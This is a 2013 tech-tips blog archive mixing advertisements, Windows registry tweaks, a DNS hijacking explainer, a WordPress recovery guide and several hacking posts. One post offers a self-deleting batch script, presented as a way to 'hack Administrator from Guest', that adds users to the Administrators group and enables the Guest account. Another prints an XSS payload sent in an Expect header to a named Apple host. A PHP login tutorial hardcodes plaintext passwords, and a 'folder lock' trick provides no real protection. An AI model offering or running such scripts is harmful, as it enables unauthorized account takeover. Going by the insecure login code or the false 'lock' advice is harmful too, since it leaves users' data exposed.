Thursday 26 September 2013

0 Ads Home Guru Free Classified Site Launched


Ads Home Guru : Post Your Classifieds In An Easiest Way-

Ads Home Guru : Free local Classified Ads and Want Ads for Housing, Apartments, Personals, Jobs, Cars, Services and more. Search over 200,000 ads with pictures ! Post your free India Ad now !


Post Your Add Go To - AdsHomeGuru.Blogspot.In

Friday 20 September 2013

0 How to password protected HTML web pages ?

In this tutorial we're going to build a login system using Anuj Hack Master and PHP.
This means you need a webhosting account which supports PHP!
Our example will have 4 pages:
1. login.php, this page will display the login form.
2. logout.php, this page can be used to logout.
3. verify.php, this page will verify the username/password combination.
4. protected_page.php, an example of a protected page

1. Creating the login pagea) Add a new page using the Site Manager and change its name to 'login'.
b) Make sure the File Extension in Page Properties is set to 'php'!
c) Add a Form, with these properties:
Name: LoginForm
Action: verify.php
Method: POST
Encoding type: <empty>
d) Add an Editbox and set its name to 'username'.
e) Add another Editbox and set its name to 'password'.
f) Add a Push Button and set the buttontype to 'Submit', change the value to 'Login'.

2. Creating the logout pagea) Add a new page using the Site Manager and change its name to 'logout'.
b) Make sure the File Extension in Page Properties is set to 'php'!
c) Open Page HTML, select the 'Start of Page' tab and enter this code:
<?php
session_start();
session_unset();
session_destroy();
?>


3. Creating the verify page
a) Add a new page using the Site Manager and change its name to 'verify'.
b) Make sure the File Extension in Page Properties is set to 'php'!
c) Open Page HTML, select the 'Start of Page' tab and enter this code:
<?php
$usernames = array("user1", "user2", "user3", "admin");
$passwords = array("password1", "password2", "password3", "admin");
$page = "protected_page.php";

for($i=0;$i<count($usernames);$i++)
{
  $logindata[$usernames[$i]]=$passwords[$i];
}

$found = 0;
for($i=0;$i<count($usernames);$i++)
{
   if ($usernames[$i] == $_POST["username"])
   {
   $found = 1;
   }
}
if ($found == 0)
{
   header('Location: login.php?login_error=1');
   exit;
}

if($logindata[$_POST["username"]]==$_POST["password"])
{
   session_start();
   $_SESSION["username"]=$_POST["username"];
   header('Location: '.$page);
   exit;
}
else
{
   header('Location: login.php?login_error=1');
   exit;
}
?>
 

This is the place to add new users.
To add a new user edit this code:

$usernames = array("user1", "user2", "admin", "new user");

Note that we've added a new user called 'new user'
Make sure you add the user's password (in the same position in the password array):

$passwords = array("password1", "password2", "admin", "new password");
4. Creating a password protected pagea) Add a new page using the Site Manager and change its name to 'protected_page'.
b) Make sure the File Extension in Page Properties is set to 'php'!
c) Open Page HTML, select the 'Start of Page' tab and enter this code:

<?php
session_start();
if(!isset($_SESSION["username"]))
{
   header('Location: login.php');
   exit;
}
?>


This code will check whether the user was succesfully logged on, if not then it will redirect the user to the login page.

Wednesday 18 September 2013

0 How to Change Windows XP Logon Screen background

You can put your favorite image or picture in the background of the logon screen by doing the following methods.
  1. Click the Start button and select “Run”
  2. In the “open” field, type regedit and click ok
  3. In the registry editor, navigate to HKEY_USERS\.DEFAULT\CONTROL PANEL\DESKTOP and double-click the string “wallpaper”
  4. Enter the full path and filename of the .bmp image that you want to use as background (the image must be in .bmp format)
  5. Click “ok” and close the registry editor
Note: Should Restart the computer for changes.
If you want to see the background set in tiled effect with the bitmap then follow the below steps.
  1. Click the Start button and select “Run”
  2. In the “open” field, type regedit and click ok
  3. change the string HKEY_USERS\.DEFAULT\CONTROL PANEL\DESKTOP\TILEWALLPAPER to “1″ instead of “0″
  4. Click “ok” and close the registry editor

Monday 16 September 2013

0 How to Change the Logon Screen on Windows 7

Some time back Will showed you how to customize Windows XP LoginWindows 7, on the other hand, has the ability to change the logon screen built into it. Well sort of, the functionality exists to make it easy for OEMs to include their custom branding, but nothing stops you to take advantage of it. In this article we shall first look into how you can change the logon screen manually and then we will point you towards some tools that make the job easier and add even more feature rich. So let’s get started.

Manually

Its is always nice to know how things work behind the scenes, what better way to do so then try them out yourself. To change the logon screen manually follow these steps:
  1. Fire up registry editor (Win Key + R and then type regedit, hit enter)
  2. Browse to
    HKLMSoftwareMicrosoftWindowsCurrentVersionAuthenticationLogonUIBackground
    , double click on key named OEMBackground and change its value to 1 (If you cannot find the path or the key go ahead and create it, remember OEMBackground is a Dword)

  3. You just enabled the OEM Background functionality. Now browse to the folder
    %windir%system32oobeinfobackgrounds
    within Windows explorer. %windir% refers to your Windows install directory
    C:Windows
    in most systems. Again the folder path may not exist already, so you can go ahead and create required folders (info and backgrounds are generally not present)

  4. Now put in any JPG file with size less than 256 kb in this folder and rename it to backgroundDefault.jpg. This file will be stretched to fit the screen, so you would want it to match the resolution of your screen so that image doesn’t look bad. You can something like smush.it or Photoshop’s Save as/Save for Web feature to reduce image size.

0 Anuj InfoSoft Special Offer Website @ 2500 only



CALL - +91- 9582550367, 
VISIT - www.anujinfosoft.com

Saturday 14 September 2013

0 How to disable the Turn Off Computer button in windows XP

Click Start button and type regedit in Run option then press Enter for next.
Here locate the location to:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Here in right side panel, right click to create a new DWORD value with the name NoClose.

Now assign number 1 in value data box and close the registry editor.

Now close the registry editor and restart your computer after any changes to go into effect.

0 DNS Hijacking: What it is and How it Works

DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the default DNS settings. In other words, when an attacker takes control of a computer to alter its DNS settings so that it now points to a rogue DNS server, the process is referred to as DNS hijacking.
As we all know, the “Domain Name System (DNS)” is mainly responsible for translating a user friendly domain name such as “google.com” to its corresponding IP address “74.125.235.46″. Having a clear idea of DNS and its working can help you better understand what DNS hijacking is all about. If you are fairly new to the concept of DNS, I would recommend reading my previous post on How Domain Name System Works.

How DNS Hijacking Works?

As mentioned before, DNS is the one that is responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet service provider (ISP) and many other private business organizations. By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer may even be using the DNS services of other reputed organizations such as Google. In this case, you are said to be safe and everything seems to work normally.

But, imagine a situation where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and maintained by the hacker. When this happens, the rogue DNS server may translate domain names of desirable websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites. As a result, when you type the URL of a website in the address bar, you may be taken to a fake website instead of the one you are intending for. Sometimes, this can put you in deep trouble!

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking can vary and depend on the intention behind the attack. Many ISPs such as “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though this can cause no serious damage to the users, it is considered as a violation of RFC standards for DNS responses.
Other dangers of DNS hijacking include the following attacks:
Pharming: This is a kind of attack where a website’s traffic is redirected to another website that is a fake one. For example, when a user tries to visit a social networking website such as Facebook.com he may be redirected to another website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue.
Phishing: This is a kind of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with that of the original one. For example, when a user tries to log in to his bank account, he may be redirected to a malicious website that steals his login details.

How to Prevent DNS Hijacking?

In most cases, attackers make use of malware programs such as a trojan horse to carry out DNS hijacking. These DNS hacking trojans are often distributed as video and audio codecs, video downloaders, YoTube downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The DNSChanger trojan is an example of one such malware that hijacked the DNS settings of over 4 million computers to drive a profit of about 14 million USD through fraudulent advertising revenue.
Also, it is necessary to change the default password of your router so that it would not be possible for the attacker to modify your router settings using the default password that came with the factory setting. For more details on this topic you can read my other post on How to hack an Ethernet ADSL Router.
Installing a good antivirus program and keeping it up-to-date can offer a great deal of protection to your computer against any such attacks.

What if you are already a victim of DNS hijacking?

If you suspect that your computer is infected with a malware program such as DNSChanger, you need not panic. It is fairly simple and easy to recover from the damage caused by such programs. All you have to do is, just verify your current DNS settings to make sure that you are not using any of those DNS IPs that are blacklisted. Otherwise re-configure your DNS settings as per the guidelines of your ISP.

0 What is HTTP Header Injection Vulnerability

HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.


I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
The alert box added in the Expect field could be injected for Cross Site Scripting.

0 How To Recover Your Hacked WordPress Website In Easy Steps?

WordPress is one of the most popular content management systems at present. However as a general law, the increasing popularity comes with a number of dangerous has gained attention of bad boys as well. There are so many people who are reporting the cases of hacked WordPress account on a regular basis. So I have thought of putting a complete guide to discuss how to recover your hacked WordPress.

Ways To Recover Hacked Account

Below is the perfect path to follow to get your hacked account back:
Backup – Even if your website is infected to a small extent, it is still very much necessary to secure the backup for your website before waiting for watching the things turning into worst. Don’t forget to take backup of your entire database and all files. You can also try for a faster solution by using BackupBuddy.
Change Login Details and Secret Access Keys – At the time you sense the hacking attempt, just try to login to your account to check whether your login details are still effective or not. If the username and password details are not yet changed then immediately change all the WordPress secret access keys in wp-config.php file and of-course your username and password.
Running Scanners – Running a scanner is also a very helpful step and comes at number 3 in this list. The scanners are basically used for identifying the compromises at the level of database. You can try out Cloud Sites WP Scanner plug-in or Sucuri Malware Scanner. After running the scanner you should make sure to move the next step stated below.
Installing Your WordPress Again – Next important step involves Deleting all the files existing in the directory of WordPress except wp-config.php file and wp-content directory. After that you need to download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file by substituting the sample values by picking the actual database values from the wp-config.php file that you haven’t deleted as stated above. Now you can delete the present file and replace it with your own file.
Review Content Folder – Next task involved to check all the folders to find ones with any suspicious activity in your wp-content directory. So carefully analyze the folders content and remove any one that seems not to be belonging to you. If you later find that the folder was actually needed then you can get it back from your backup.
Analyze and Re-install Your Plug-ins – The next steps after completing with reviewing the folders’ content includes reviewing the plug-ins. Collect information about what plug-ins you are not using currently and uninstall them all for the time being. Now coming to all other activated plug-ins that you are using currently, deactivate and delete these plug-ins and then re-install and activate the active plug-ins.
Analyze Your Themes – Now the next thing that should be taken care of is the task of removing the extra themes which are not in use currently. Next task again involves reviewing your activated theme. Look through the PHP or Javascript code to find out any suspicious activity there. Most of the time hackers make such malicious changes in header.php or footer.php files.

Following this step by step guide can really help you a lot in getting your WordPress back. Also always remember to keep checking for the activities on your WordPress site. Also make it a habit to keep a time by time backup of your database. For more recovery details you can check on http://codex.wordpress.org/FAQ_My_site_was_hacked.

How to Secure before Getting hacked !

Every one is looking to make their blog looks secure and try to make their blog safe from hackers so that hackers can not take any kind of information from your blog. You can protect and increase security of your by doing following things :-
Chap Secure plugin
You can increase the security of your log-in by using Chap secure plugin, It helps in encrypting passwords by using CHAP protocol. It will help hacker to get in trouble.
Login Lockdown Plugin
This plugin helps a lot in stopping a hacker because if he is trying to play with your login screen then this plugin will limit hit after few wrong attempts.Just download the plugin and activate it. This plugin helps to secure your blog from newbie hackers. ;)
WP Security Scan
This plugin helps to check all the codes of your website from hacking Malware and scripts. It can find out which code or which file has virus in the blog.
Updating WordPress regularly
Try to upgrade the WordPress regularly as soon as any new version is launched. Most of the bloggers do not update WordPress and chances are huge that old WordPress version can get hacked.
Tac Theme Checker
You can install a plugin “Tac Theme checker” which can check your theme before activating it. It helps you to check the complete theme when you upload it into Dashboard and it helps to check the files completely in few seconds.
Make your security Bullet proof
You should increase your security more and more by adding some official steps from WordPress website and you can read them here http://codex.wordpress.org/Hardening_WordPress.
Theme of your Blog
Your theme plays an important part in hacking, If you are using some cracked version of theme then be ready to get hacked soon. Cracked themes often have codes which helps to get you hacked. I would suggest that get a proper theme from any web design company so that there is no chance to get hacked due to unethical themes.
I hope these steps will help you to protect from all the hack attempts. If you have any other method then do let us know in below comments. Thank you

Friday 6 September 2013

0 Anuj InfoSoft Website Special Offer Rs. 2500

Website Special Offer  Only Rs. 2500 / 
 Today Conatact and Order To Your Website  - +91- 9582550367 
www.anujinfosoft.com

Wednesday 4 September 2013

0 Lock your PRIVATE FOLDER


1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it ! :)

0 Computer Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Enjoy